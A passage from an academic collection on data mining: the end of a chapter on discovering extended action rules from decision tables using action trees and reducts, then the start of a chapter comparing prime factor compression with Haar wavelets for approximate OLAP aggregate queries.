& Tuzhilin, 1997; Liu, Hsu, Chen, 1997; Silberschatz & Tuzhilin, 1995, 1996). Objective measures are data driven and domain independent. Generally, they evaluate the rules based on their quality and similarity between them. Subjective measures, including unexpectedness, novelty, and actionability, are user driven and domain dependent. The notion of an action rule, constructed from certain pairs of association rules, has been proposed in Ras and Wieczorkowska (2000). Its different definition was given earlier in Geffner and Wainer (1998). Also, interventions introduced in Greco, Matarazzo, Pappalardo, and Slowinski (2005) are conceptually very similar to action rules. Action rules have been investigated further in Tsay and Ras (2005, 2006), Tzacheva and Ras (2005), and Ras and Dardzinska (2006). To give an example justifying the need of action rules, let us assume that a number of customers have closed their accounts at one of the banks. We construct possibly the simplest description of that group of people and next search for a new description, similar to the one we have, with a goal to identify a new group of customers from which no one left that bank. If these descriptions have a form of rules, then they can be seen as actionable rules. Now, by comparing these two descriptions, we may find the cause why these accounts have been closed, and formulate an action that, if undertaken by the bank, may prevent other customers from closing their accounts. For example, an action rule may say that by inviting people from a certain group of customers for a glass of wine by the bank, it is almost guaranteed that these customers will not close their accounts and they do not move to another bank. Sending invitations by regular mail to all these customers, or inviting them personally by giving them a call, are examples of an action associated with that action rule. In Tzacheva and Ras (2005), the notion of a cost and feasibility of an action rule was introduced. The cost is a subjective measure and feasibility is an objective measure. Usually, a number of action
2314
rules or chains of action rules can be applied to reclassify a certain set of objects. The cost associated with changes of values within one attribute is usually different than the cost associated with changes of values within another attribute. The strategy for replacing the initially extracted action rule by a composition of new action rules, dynamically built and leading to the same reclassification goal, was proposed in Tzacheva and Ras (2005). This composition of rules uniquely defines a new action rule. Objects supporting the new action rule also support the initial action rule, but the cost of reclassifying them is lower or even much lower for the new rule. In Ras and Dardzinska (2006), authors propose a new simplified strategy for constructing action rules. In this chapter, we present an algebraic extension of this method, and show the close correspondence between the rules generated by tree-based strategy (Tsay & Ras, 2005) and rules constructed by this newest method.
BACKGROUND In the paper by Ras and Wieczorkowska (2000), the notion of an action rule was introduced. The main idea was to generate, from a database, special types of rules that basically form a hint to users showing a way to reclassify objects with respect to some distinguished attribute (called a decision attribute). Values of some attributes used to describe objects stored in a database can be changed, and this change can be influenced and controlled by the user. However, some of these changes (for instance “profit”) cannot be done directly to a decision attribute. In such a case, definitions of this decision attribute in terms of other attributes (called classification attributes) have to be learned. These new definitions are used to construct action rules, showing what changes in values of some attributes for a given class of objects are needed to reclassify objects the way users want. But users may still be either unable
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
or unwilling to proceed with actions leading to such changes. In all such cases, we may search for definitions of values of any classification attribute listed in an action rule. By replacing a value of such an attribute by its definition, extracted either locally or at remote sites (if system is distributed), we construct new action rules that might be of more interest to users than the initial rule (Tzacheva & Ras, 2005). We start with a definition of an information system given in Pawlak (1991). By an information system, we mean a pair S = (U, A), where: 1. 2.
U is a nonempty, finite set of objects (object identifiers), A is a nonempty, finite set of attributes, that is, a:U→ Va for a∈A, where Va is called the domain of a.
Information systems can be seen as decision tables. In any decision table, together with the set of attributes, a partition of that set into conditions and decisions is given. Additionally, we assume that the set of conditions is partitioned into stable and flexible (Ras & Wieczorkowska, 2000). Attribute a ∈ A is called stable for the set U if its values, assigned to objects from U, cannot be changed in time; otherwise, it is called flexible. “Place of birth” is an example of a stable attribute. “Interest rate” on any customer account is an example of a flexible attribute. For simplicity reasons, we consider decision tables with only one decision. We adopt the following definition of a decision table: By a decision table, we mean an information system S = (U, ASt∪AFl ∪{d}), where d∉ASt ∪ AFl is a distinguished attribute called the decision. The elements of ASt are called stable conditions, whereas the elements of A Fl ∪{d} are called flexible. Our goal is to change values of attributes in AFl for some objects in U so the values of the attribute d for these objects may change as well. Certain relationships between attributes from
ASt ∪AFl and the attribute d will have to be discovered first. By Dom(r) we mean all attributes listed in the IF part of a rule r extracted from S. For example, if r = [ (a1,3)*(a2,4) → (d,3)] is a rule, then Dom(r) = {a1,a2}. By d(r) we denote the decision value of rule r. In our example d(r) = 3. If r1, r2 are rules and B ⊆ AFl∪ASt is a set of attributes, then r1/B = r2/B means that the conditional parts of rules r1, r2 restricted to attributes B are the same. For example if r1 = [(a1,3) → (d,3)], then r1/{a1} = r/{a1}. Assume also that (a, v → w) denotes the fact that the value of attribute a has been changed from v to w. Similarly, the term (a, v → w)(x) means that a(x)=v has been changed to a(x)=w; in other words, the property (a,v) of an object x has been changed to property (a,w). Assume now that rules r1, r2 have been extracted from S and r1/[Dom(r1)∩Dom(r2)∩ASt]= r2/[ Dom(r1)∩Dom(r2)∩ASt], d(r1)=k1, d(r2)=k2. Also, assume that (b1, b2,…, bp) is a list of all attributes in Dom(r1) ∩ Dom(r2) ∩ AFl on which r1, r2 differ and r1(b1)= v1, r1(b2)= v2,…, r1(bp)= vp, r2(b1)= w1, r2(b2)= w2,…, r2(bp)= wp. By (r1,r2)-action rule on x∈U we mean a statement r: [r2/ASt ∧ (b1, v1→ w1) ∧ (b2, v2 → w2) ∧…∧ (bp, vp → wp)](x) ⇒ [(d, k1 → k2)](x). Object x∈U supports action rule r, if x supports r1, (∀a∈Dom(r2) ∩ASt) [a(x) = r2(a)], (∀i≤p)[bi(x)=vi], and d(x)=k1. The set of all objects in U supporting r is denoted by U. To define an extended action rule (Ras & Tsay, 2003), let us assume that two classification rules are considered. We present them in Table 1 to better clarify the process of constructing extended action rules. Here, “St” means stable classification attribute and “Fl” means flexible one. In a classical representation, these two rules have a form:
2315
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
Table 1. a (St)
b (Fl)
a1
b1
a1
b2
c (St) c1
e (Fl)
h (Fl)
e1
r1 = [ a1 ∧ b1 ∧ c1 ∧ e1 → d1 ] , r2 = [ a1 ∧ b2 ∧ g2 ∧ h2 → d2 ]. It is easy to check that [[a1 ∧ g2 ∧ (b, b1 → b2)] ⇒ (d, d1 → d2)] is the (r1,r2)-action rule. Assume now that object x supports rule r1, which means that x is classified as d1. In order to reclassify x to class d2, we need to change its value b from b1 to b2, but also we have to require that g(x)=g2 and that the value h for object x has to be changed to h2. This is the meaning of the extended (r1,r2)-action rule r given next: [[a1 ∧ g2 ∧ (b, b1 → b2) ∧ (h, → h2)] ⇒ (d, d1→ d2)]. Let us observe that this extended action rule can be replaced by a class of new action rules. First, we need to define a new relation ≈h on the set U as: x ≈h y iff h(x)=h(y), for any x, y ∈ U. Now, let us assume that Vh ={h1,h2,h3} and U = U/≈h = {y∈U: h(y)=hi}, for any i=1,2,3. The extended action rule r can be replaced by two action rules: [[a1 ∧ g2 ∧ (b, b1 → b2) ∧ (h, h1→ h2)] ⇒ (d, d1→ d2)] with supporting set U
2316
g (St)
d (Decision) d1
g2
h2
d2
and [[a1 ∧ g2 ∧ (b, b1 → b2) ∧ (h, h3→ h2)] ⇒ (d, d1→ d2)] with supporting set U. This example shows that extended action rules can be seen as generalizations of action rules. Also, it gives us a hint of how to look for the most compact representations of action rules.
Main Thrust of the Chapter 1. Issues, Controversies, Problems In this section, we present a modification of the action-tree algorithm (Tsay & Ras, 2005) for discovering action rules. Namely, we partition the set of classification rules R discovered from a decision system S = (U, ASt ∪AFl ∪{d}), where ASt is the set of stable attributes, AFl is the set of flexible attributes, and, Vd = {d1, d2,..., d k} is the set of decision values, into subsets of rules having the same values of stable attributes in their classification parts and defining the same value of the decision attribute. Classification rules can be extracted from S using, for instance, discovery system LERS (Grzymala-Busse, 1997). Action-tree algorithm for discovering extended action rules from a decision system S is as follows:
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
Build Action Tree: Step 1. • Partition the set of classification rules R in a way that two rules are in the same class if their stable attributes are the same. • Find the cardinality of the domain Vvi for each stable attribute vi in S. • Take vi, which card(Vvi) is the smallest, as the splitting attribute, and divide R into subsets, each of which contains rules having the same value of the stable attribute vi. • For each subset obtained in step 2, determine if it contains rules of different decision values and different values of flexible attributes. If it does, go to step 2. If it does not, there is no need to split the subset further, and we place a mark. Step 2. • Partition each resulting subset into new subsets, each of which contains only rules having the same decision value. Step 3. • Each leaf of the resulting tree represents a set of rules that do not contradict on stable attributes, and also it uniquely defines decision value di. The path from the root to that leaf gives the description of objects supported by these rules.
node. When we are done with stable attributes, the last split is based on a decision attribute for each current leaf of action tree. If at any time all classification rules representing a node have the same decision value, then we stop constructing that part of the tree. We still have to explain which stable attributes are chosen to split classification rules representing a node of action tree. The algorithm selects any stable attribute that has the smallest number of possible values among all the remaining stable attributes. This step is justified by the need to apply a heuristic strategy (Ras, 1999) that will minimize the number of edges in the resulting tree and at the same time, make the complexity of the algorithm lower. We have two types of nodes: a leaf node and a nonleaf node. At a nonleaf node, the set of rules is partitioned along the branches, and each child node gets its corresponding subset of rules. Every path to the decision attribute node, one level above the leaf node, represents a subset of the extracted classification rules when the stable attributes have the same value. Each leaf node represents a set of rules that do not contradict on stable attributes, and also define decision value di. The path from the
Table 2.
Generate Extended Action Rules a
•
Form extended action rules by comparing all unmarked leaf nodes of the same parent.
The algorithm starts at the root node of the tree, called action tree, representing all classification rules extracted from S. A stable attribute is selected to partition these rules. For each value of that attribute, an outgoing edge from the root node is created, and the corresponding subset of rules that have the attribute value assigned to that edge is moved to the newly created child node. This process is repeated recursively for each child
x1 x2 x3 x4 x5 x6 x7 x8 x9 x10 x11 x12
2 2 1 1 2 2 2 2 2 2 1 1
b 1 1 1 1 3 3 1 1 2 3 1 1
c 2 2 0 0 2 2 1 1 1 0 2 1
d L L H H H H L L L L H H
2317
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
root to that leaf gives the description that objects supporting these rules have to satisfy. Instead of splitting the set of rules R by stable attributes and next by the decision attribute, we can also start the partitioning algorithm from a decision attribute. For instance, if a decision attribute has three values, we get three initial subtrees. In the next step of the algorithm, we start splitting these subtrees by stable attributes, following the same strategy as the one presented for action trees. This new algorithm is called action-forest algorithm. Now, let us take Table 2 as an example of a decision system S. Attributes a, c are stable, and b, d are flexible. Assume now that our plan is to reclassify some objects from the class (d,L) into the class (d,H). Table 3 shows the set of classification rules extracted from Table 2 by LERS algorithm (Grzy-
Figure 1.
2318
mala-Busse, 1997). The first column presents sets of objects supporting these rules. First, we represent the set R of certain rules extracted from S as a table (see Table 3). The first column of this table shows objects in S supporting the rules from R (each row represents a
Table 3. Objects
a
b
c
d
{x3,x4,x11,x12}
1
{x1,x2,x7,x8}
2
1
L
{x7,x8,x9}
2
0
L
H
{x3,x4}
1
0
H
{x5,x6}
3
2
H
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
rule). For instance, the second row represents the rule [[(a,2) ∧(c, 1)] → (d, L)]. The construction of an action tree starts with the set R as a table (see Table 3) representing the root of the tree T1 in Fig. 1. The root node selection is based on a stable attribute, with the smallest number of values among all stable attributes. The same strategy is used for a child node selection. After labeling the nodes of the tree by all stable attributes, the tree is split, based on the value of the decision attribute. Referring back to the example in Table 3, we use stable attribute a to split that table into two subtables defined by values {1, 2} of attribute a. The domain Va of attribute a is {1, 2}. Since card[Va] < card[Vc], then we partition the table into two: one table with rules containing the term (a,1) and another with rules containing the term (a,2). Corresponding edges are labeled by values of attribute a. All rules in the subtable T2 have the same decision value. So, action rules cannot be constructed from subtable T2, which means it is not divided any further. Because rules in the subtable T3 contain different decision values and a stable attribute c, T3 is partitioned into three subtables, one with rules containing the term (c, 0), one with rules containing (c, 1), and one with rules containing (c, 2). Now, rules in each of the subtables do not contain any stable attributes. Subtable T6 is not split any further for the same reason as subtable T2. All objects in subtable T4 have the same value of flexible attribute b. So, there is no way to construct a workable strategy from this subtable, which means it is not partitioned any further. Subtable T5 is divided into two new subtables. Each leaf represents a set of rules that do not contradict on stable attributes, and also define decision value di. The path from the root of the tree to that leaf gives the description of objects supported by these rules. Following the path described by the term (a, 2)∧(c, 2)∧(d , L), we get table T7. Following the path described by the term (a, 2)∧(c, 2)∧(d, H), we get table T8. Because T7 and T8 are sibling nodes, we can directly compare pairs of rules belonging
to these two tables and construct an action rule [[(a,2) ∧ (b, 1 → 3)] ⇒ (d, L → H)]. The action-tree algorithm proposed in this section requires the extraction of all classification rules from the decision system before any action rule is constructed. Additionally, the strategy of action rules extraction presented has 0(k 2) complexity in the worth case, where k is the number of classification rules. The question is, if any action rule can be constructed from a single classification rule by a strategy that guarantees the same time complexity of action rules construction as the time complexity of classification rules discovery?
2. Solutions and Recommendations Let us assume again that S = (U, ASt ∪AFl ∪{d}) is a decision system, where d ∉ ASt ∪AFl is a distinguished attribute called the decision. The elements of ASt are called stable conditions, whereas the elements of AFl ∪{d} are called flexible. Assume that d1 ∈ Vd and x ∈ U. We say that x is a d1-object if d(x)=d1. We also assume that {a1, a2,..., ap} ⊆ AFl, {b1, b2,..., bq} ⊆ ASt, a[i,j] denotes a value of attribute ai, b[i,j] denotes a value of attribute bi, for any i, j and that: r = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [b[1,1] ∧ b[2,1] ∧ ..... ∧ b[q,1]] → d1] is a classification rule extracted from S supporting some d1-objects in S. By sup(r) and conf(r), we mean the support and the confidence of r, respectively. Class d1 is a preferable class, and our goal is to reclassify d2-objects into d1 class, where d2 ∈Vd. By an extended action rule r[d2 → d1] associated with r and the reclassification task (d, d2 → d1) we mean the following expression: r[d2 → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])]
2319
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
In a similar way, by an extended action rule r[ → d1] associated with r and the reclassification task (d, → d1) we mean the following expression: r[ → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])] d1)]. The term [a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]], built from values of stable attributes, is called the header of the action rule r[d2 → d1], and its values cannot be changed. The support set of the action rule r[d2 → d1] is defined as: Sup(r[d2 → d1]) = {x ∈ U: ( a1(x)=a[1,1] ∧ a2(x)=a[2,1] ∧ ... ∧ ap(x)=a[p,1] ) ∧ (d(x)=d2) }. Clearly, if conf(r) ≠ 1, then some objects in S satisfying the description [a[1,1] ∧ a[2,1] ∧... ∧ a[p,1] ∧ b[1,1] ∧ b[2,1] ∧ ..... ∧ b[q,1]] are classified as d2. According to the rule r[d2 → d1] they should be classified as d1, which means that the confidence of r[d2 → d1] will get decreased. If Sup(r[d2 → d1]) = ∅, then r[d2 → d1] cannot be used for reclassification of objects. Similarly, r[ →d1] cannot be used for reclassification if Sup(r[d2 → d1])= ∅ for each d2 where d2 ≠ d1. From the point of view of actionability, such rules are not interesting (Silberschatz & Tuzhilin, 1995, 1996). In the following paragraph, we show how to calculate the confidence of action rules and extended action rules. Let r[d2 → d1], r'[d2 → d3] be two action rules extracted from S. We say that these rules are p-equivalent (≈), if the following condition holds for every bi ∈ AFl ∪ASt: if r/bi, r'/bi are both defined, then r/bi = r'/bi. Now, we explain how to calculate the confidence of r[d2 → d1]. Let us take d2-object x ∈ Sup(r[d2 → d1]). We say that x positively supports r[d2 → d1] if there is no clas-
2320
sification rule r' extracted from S and describing d3 ∈ Vd, d3 ≠ d1, which is p-equivalent to r, such that x ∈ Sup(r'[d2 →d3]). The corresponding subset of Sup(r[d2 → d1]) is denoted by Sup+(r[d2 → d1]). Otherwise, we say that x negatively supports r[d2 → d1]. The corresponding subset of Sup(r[d2 → d1]) is denoted by Sup-(r[d2 → d1]). By the confidence of r[d2 → d1] in S we mean: Conf(r[d2 → d1]) = [card[Sup+(r[d2 → d1])]/card[Sup(r[d2 )]] ⋅ conf(r). →d1] Now, let us go back to the definition of an extended action rule r[d2 → d1] associated with r: r[d2 → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])] ⇒ (d, d2 → d1)]. In the previous section, we introduced the relation ≈bi defined on the set U as: x ≈bi y iff bi(x)=bi(y), for any x, y ∈ U. Now, assume that B = {b1,b2,…,bq} and ≈B = ∩{ ≈bi : bi ∈B}. We say that B is bi-reducible with respect to an extended action rule r in S, if U/≈B = U/≈B-{bi}, for any bi ∈B. We say that C ⊆ B is a reduct with respect to an extended action rule r if U/≈B = U/≈C and for any bi ∉ C, the set C is not bi-reducible with respect to an extended action rule r in S.
Theorem Each reduct with respect to an extended action rule r in S defines uniquely a new extended action rule in S. Proof (sketch). Assume that: r[d2 → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])] ⇒ (d, d2 → d1)]
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
is an extended action rule in S and for instance [B-{b1,b2}] is a reduct with respect to r[d2 → d1]. It basically means that all objects in U have the same value in a case of attributes b1, b2. Let us assume that b[1,i], b[2,j] are these two values. Because [B-{b1,b2}] is a reduct, then:
might be high only because of the high cost value of one of its subterms in the conditional part of the rule. Let us assume that (bj, vj → wj) is that term. In such a case, we may look for an action rule in RS[(bj, vj →wj)] that has the smallest cost value. Assume that:
{x: [a1(x)=a[1,1] ∧ a2(x)=a[2,1] ∧ ... ∧ ap(x)=a[p,1]] ∧ d(x)=d2 ∧ [b1(x)=b[1,i] ∧ b2(x)=b[2,j]]} is not an empty set. The rule:
Clearly, the cost of this new rule is lower than the cost of r. However, if its support in S gets too low, then such a rule has no value to us. Otherwise, we may recursively follow this strategy, trying to lower the cost needed to reclassify objects from the group d1 into the group d2. Each successful step will produce a new action rule whose cost is lower than the cost of the current rule. Obviously, this heuristic strategy always ends. Interestingness of rules is closely linked with their cost. It means that new algorithms showing how too look for rules of the lowest cost are needed. An example of such an algorithm can be found in Tzacheva and Ras (2005).
Assume that d is a decision attribute in S, d1, d2 ∈ Vd, and the user would like to reclassify objects in S from the group d1 to the group d2. Assuming that the cost of reclassification with respect to each attribute is given, he/she may look for an appropriate action rule, possibly of the lowest cost value, to get a hint which attribute values need to be changed (Tzacheva & Ras, 2005). To be more precise, let us assume that RS[(d, d1 → d2)] denotes the set of all action rules in S having the term (d, d1 → d2) on their decision site. Additionally, we assume that the cost representing the left-hand site of the rule in RS[(d, d1 → d2)] is always lower than the cost associated with its right hand site. Now, among all action rules in RS[(d, d1 → d2)], we may identify a rule that has the lowest cost value. But the rule we get may still have the cost value that is much too high to be of any help. Let us notice that the cost of the action rule: r = [(b1, v1 → w1) ∧ (b2, v2 → w2) ∧ ... ∧ (bp, vp → wp)] ⇒ (d, d1 → d2)
CONCLUSION Attributes are divided into two groups: stable and flexible. By stable attributes we mean attributes whose values cannot be changed (for instance, age or maiden name). On the other hand, attributes (like percentage rate or loan approval to buy a house) whose values can be changed are called
2321
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
flexible. Classification rules are extracted from a decision table, using standard KD methods, with preference given to flexible attributes, so mainly they are listed in a classification part of rules. Most of these rules can be seen as actionable rules and the same used to construct action rules. Two methods for discovering extended action rules are presented. The first one, based on action trees, requires comparing pairs of classification rules and, depending on the result of this comparison, an action rule is either built or not. The second strategy shows how to construct extended action rules from a single classification rule. In its first step, the most general extended action rule is built, and next, it is partitioned into a number of atomic expressions representing a new class of extended action rules that jointly represent the initial extended action rule. The first strategy can be seen as bottom-up method, whereas the second strategy is a classical example of a topdown method.
REFERENCES Adomavicius, G., & Tuzhilin, A. (1997). Discovery of actionable patterns in databases: The action hierarchy approach. In Proceedings of KDD97 Conference. Newport Beach, CA: AAAI Press Geffner, H., & Wainer, J. (1998). Modeling action, knowledge and control. In H. Prade (Ed.), ECAI 98, 13th European Conference on AI (pp. 532-536). John Wiley & Sons. Greco, S., Matarazzo, B., Pappalardo, N., & Slowinski, R. (2005). Measuring expected effects of interventions based on decision rules. Journal of Experimental and Theoretical Artificial Intelligence, Taylor Francis, 17(1-2). Grzymala-Busse, J. (1997). A new version of the rule induction system LERS. Fundamenta Informaticae, 31(1), 27-39.
2322
Liu, B., Hsu, W., & Chen, S. (1997). Using general impressions to analyze discovered classification rules. In Proceedings of KDD97 Conference. Newport Beach, CA: AAAI Press. Pawlak, Z. (1991). Information systems— theoretical foundations. Information Systems Journal, 6, 205-218. Ras, Z. (1999). Discovering rules in information trees In J. Zytkow & J. Rauch (Eds.), Principles of Data Mining and Knowledge Discovery, Proceedings of PKDD’99, Prague, Czech Republic, LNAI, No. 1704 (pp. 518-523). Springer. Ras, Z.W., & Dardzinska, A. (2006). Action rules discovery, a new simplified strategy. In F. Esposito et al., Foundations of Intelligent Systems, Proceedings of ISMIS’06, Bari, Italy, LNAI, No. 4203 (pp. 445-453). Springer. Ras Z., & Tsay, L.-S. (2003). Discovering extended actions-rules, System DEAR. In Intelligent Information Systems 2003, Advances in software computing. In Proceedings of IIS2003 Symposium, Zakopane, Poland (pp. 293-300). Ras, Z.W., Tzacheva, A., & Tsay, L.-S. (2005). Action rules. In J. Wang (Ed.), Encyclopedia of data warehousing and mining (pp. 1-5). Idea Group Inc. Ras, Z., & Wieczorkowska, A. (2000). Action rules: How to increase profit of a company. In D.A. Zighed, J. Komorowski, & J. Zytkow (Eds.), Principles of data mining and knowledge discovery, Proceedings of PKDD'00, Lyon, France, LNAI, No. 1910 (pp. 587-592). Springer. Silberschatz, A., & Tuzhilin, A., (1995). On subjective measures of interestingness in knowledge discovery. In Proceedings of KDD'95 Conference. AAAI Press Silberschatz, A., & Tuzhilin, A. (1996). What makes patterns interesting in knowledge discovery
Extended Action Rule Discovery Based on Single Classification Rules and Reducts
systems. IEEE Transactions on Knowledge and Data Engineering, 5(6). Tsay, L.-S., & Ras, Z.W. (2005). Action rules discovery system DEAR, method and experiments. Journal of Experimental and Theoretical Artificial Intelligence, 17(1-2), 119-128.
(Eds.), Foundations of Intelligent Systems, Proceedings of ISMIS’06, Bari, Italy, LNAI, No. 4203 (pp. 483-492). Springer. Tzacheva, A., & Ras, Z.W. (2005). Action rules mining. International Journal of Intelligent Systems, 20(7), 719-736.
Tsay, L.-S., & Ras, Z.W. (2006). Action rules discovery system DEAR3. In F. Exposito et al.
This work was previously published in Rough Computing: Theories, Technologies and Applications, edited by A. Hassanien, Z. Suraj, D. Slezak, and P. Lingras, pp. 175-184, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
2323
2324
Chapter 7.24
Optimization of Multidimensional Aggregates in Data Warehouses Russel Pears Auckland University of Technology, New Zealand Bryan Houliston Auckland University of Technology, New Zealand
ABSTRACT The computation of multidimensional aggregates is a common operation in OLAP applications. The major bottleneck is the large volume of data that needs to be processed which leads to prohibitively expensive query execution times. On the other hand, data analysts are primarily concerned with discerning trends in the data and thus a system that provides approximate answers in a timely fashion would suit their requirements better. In this article we present the prime factor scheme, a novel method for compressing data in a warehouse. Our data compression method is based on aggregating data on each dimension of the data warehouse. We used both real world and synthetic data to compare our scheme against the Haar wavelet and our experiments on range-sum queries show that it outperforms the
latter scheme with respect to both decoding time and error rate, while maintaining comparable compression ratios. One encouraging feature is the stability of the error rate when compared to the Haar wavelet. Although wavelets have been shown to be effective at compressing data, the approximate answers they provide varies widely, even for identical types of queries on nearly identical values in distinct parts of the data. This problem has been attributed to the thresholding technique used to reduce the size of the encoded data and is an integral part of the wavelet compression scheme. In contrast the prime factor scheme does not rely on thresholding but keeps a smaller version of every data element from the original data and is thus able to achieve a much higher degree of error stability which is important from a Data Analysts point of view.
Optimization of Multidimensional Aggregates in Data Warehouses
INTRODUCTION Data warehouses are increasingly being used by decision makers to analyze trends in data (Cunningham, Song & Chen, 2006, Elmasri & Navathe, 2003). Thus a marketing analyst is able to track variation in sales income across dimensions such as time period, location, and product on their own or in combination with each other. This analysis requires the processing of multi-dimensional aggregates and groups by operations against the underlying data warehouse. Due to the large volumes of data that needs to be scanned from secondary storage, such queries, referred to as On Line Analytical Processing (OLAP) queries, can take from minutes to hours in large scale data warehouses (Elmasri, 2003, Oracle 9i). The standard technique for improving query performance is to build aggregate tables that are targeted at known queries (Elmasri, 2003; Triantafillakis, Kanellis, & Martakos 2004). For example the identification of the top 10 selling products can be speeded up by building a summary table that contains the total sales value (in dollar terms) for each of the products sorted in decreasing order of sales value. It would then be a simple matter of querying the summary table and retrieving the first 10 rows. The main problem with this approach is the lack of flexibility. If the analyst now chooses to identify the bottom 10 products an expensive re-sort would have to be performed to answer this new query. Worst still, if the information is to be tracked by sales location then the summary table would be of no value at all. This problem is symptomatic of a more general one, where database systems which have been tuned for a particular access pattern perform poorly as changes to such patterns occur over a period of time. In their study (Zhen & Darmont, 2005) showed that database systems which have been optimized through clustering to suit particular query patterns rapidly degrade in performance when such query patterns change in nature.
The limitations in the above approach can be addressed by a data compression scheme that preserves the original structure of the data. For example, a 3-dimensional warehouse that tracks sales by time period, location and products can be compressed along all three dimensions and then stored in the form of “chunks” (Sarawagi & Stonebraker, 1994). Chunking is a technique that is used to partition a d-dimensional array into smaller d-dimensional units. In principle, any data compression scheme can be applied on a data warehouse, but we were mindful of the fact that a high compression ratio would be needed to offset the potentially huge secondary storage access times. This effectively ruled out standard compression techniques such as Huffman coding (Cormack, 1985), LZW and its variants (Lempel & Ziv, 1977; Hunt 1998) Arithmetic Coding (Langdon, 1984). These schemes enable decoding to the original data with 100% accuracy, but suffer from modest compression ratios (Ng & Ravishankar, 1997). On the other hand, the trends analysis nature of decision making means that query results do not need to reflect 100% accuracy. For example, during a drill-down query sequence in ad-hoc data mining, initial queries in the sequence usually determine the truly interesting queries and regions of the database. Providing approximate, yet reasonably accurate answers to these initial queries gives users the ability to focus their explorations quickly and effectively, without consuming inordinate amounts of valuable system resources (Hellerstein, Haas, & Wang, 1997). This means that lossy schemes which exhibit relatively high compression and near 100% accuracy would be the ideal solution to achieving acceptable performance for OLAP queries. This article investigates the performance of a novel scheme, called prime factor compression (PFC) and compares it against the well known wavelet approach (Chakrabarti & Garofalakis, 2000; Vitter & Wang, 1998; Vitter & Wang 1999).
2325
Optimization of Multidimensional Aggregates in Data Warehouses
The rest of the article is organized as follows. In the next section we review related work and establish a framework on which PFC is built. We then present the algorithms required for encoding and decoding with the PFC approach. The online reconstruction of Queries is discussed thereafter. Implementation related issues are presented, followed by a performance evaluation of PFC and comparison with the Haar wavelet algorithm. We conclude the article with a summary and discuss some ideas for future work.
RELATED WORK Previous research tends to concentrate on computing exact answers to OLAP queries (Ho, & Agrawal, 1997, Wang, Feng, Lu, & Yu, 2002). Ho describes a method that pre-processes a data cube to give a prefix sum cube. The prefix sum cube is computed by applying the transformation: P[Ai]=C[Ai]+P[Ai-1] along each dimension of the data cube, where P denotes the prefix sum cube, C the original data cube, Ai denotes an element in the cube, and i is an index in a range 1..Di (Di is the size of the dimension Di). This means that the prefix cube requires the same storage space as the original data cube. The above approach is efficient for low dimensional data cubes. For high dimensional environments, two major problems exist. First, the number of accesses required is 2d (Ho & Agrawal, 1997), which can be prohibitive for large values of d (where d denotes the number of dimensions). Second, the storage required to store the prefix sum cube can be excessive. In a typical OLAP environment the data tends to be massive and yet sparse at the same time. The degree of sparsity increases with the number of dimensions (OLAP) and thus the number of non-zero cells may be a very small fraction of the prefix sum cube, which by its nature has to be dense for its query processing algorithms to work correctly.
2326
Another exact technique is the Dwarf cube method (Sismannis & Deligiannakis, 2002) which seeks to eliminate structural redundancies and factor them out by coalescing their store. Pre-fix redundancy arises when the fact table contains a group of tuples having a prefix of redundant values for its dimension attributes. On the other hand, suffix redundancy occurs when groups of tuples contain a suffix of redundant values for its dimension attributes. Elimination of these redundancies has been shown to be effective for dense cubes. Unfortunately, in the case of sparse cubes with a large number of dimensions the size of the fact table can actually increase in size (Sismannis & Deligiannakis, 2002), thus providing no gains in storage efficiency. In contrast to exact methods, approximate methods attempt to strike a good balance between the degree of compression and accuracy. Query performance is enhanced by storing a compact version of the data cube. A histogram-based approach was used by (Matias & Vitter, 1998; Poosala & Gnati, 1999; Vitter & Wang, 1998), to summarize the data cube. However, histograms also suffer from the curse of high dimensionality, with both space and time complexity increasing exponentially with the number of dimensions (Matias & Vitter, 1998). The progressive approximate aggregate approach (Lazaridis & Mehrotra, 2001) uses a tree structure to speed up the computation of aggregates. Aggregates are computed by identifying tree nodes that intersect the query region and then accumulating their values incrementally. All tree nodes that are fully contained in the query region provide an exact contribution to the query result, whereas nodes that have a partial intersection provide an estimate. This estimation is based on an assumption of spatial uniformity of attribute values across the underlying data cube. In practice this assumption may be invalid as with the case of the real world data (U.S. Census) that we experimented with in our study. In contrast, our
Optimization of Multidimensional Aggregates in Data Warehouses
method makes no such assumptions on the shape of the source data distribution. Another issue with the previously mentioned scheme is that it has a worst case run time performance that is linear in the number of data elements covered by the query, as observed by (Chen et al., 2003). This has negative implications for queries that span a large fraction of the underlying data cube, particularly since compression is not utilized to store source data. Sampling is another approach that has been used to speed up aggregate processing. Essentially, a small random sample of the database is selected and the aggregate is computed on this sample. The sampling operation can be done off-line, whereby the sample is extracted from the database and all queries are run on this single extracted sample. On the other hand, online sampling data is read randomly from the database each time a query is executed and the aggregate computed on the dynamically generated sample (Hellerstein, Haas, & Wang, 1996). The very nature of sampling makes it very efficient in terms of run time, but its accuracy has been shown to be a limiting factor in its widespread adoption (Vitter & Wang, 1999). Vitter and Wang (1999), use the wavelet technique to transform the data cube into a compact form. It is essentially a data compression technique that transforms the original data cube into a wavelet transform array (WTA), which is a fraction of the size of the original data cube. In their research, Matias and Vitter (1998) show that wavelets are superior to the histogram based methods, both in terms of accuracy and storage efficiency. Wavelets have also been shown to provide good compression with sparse data cubes, unlike the Dwarf compression method. Given the wavelet’s superior performance over its rivals and the fact that it is an approximate technique, it was an ideal choice for comparison against our prime factor scheme, which is also approximate in nature. The next section provides a brief overview of the 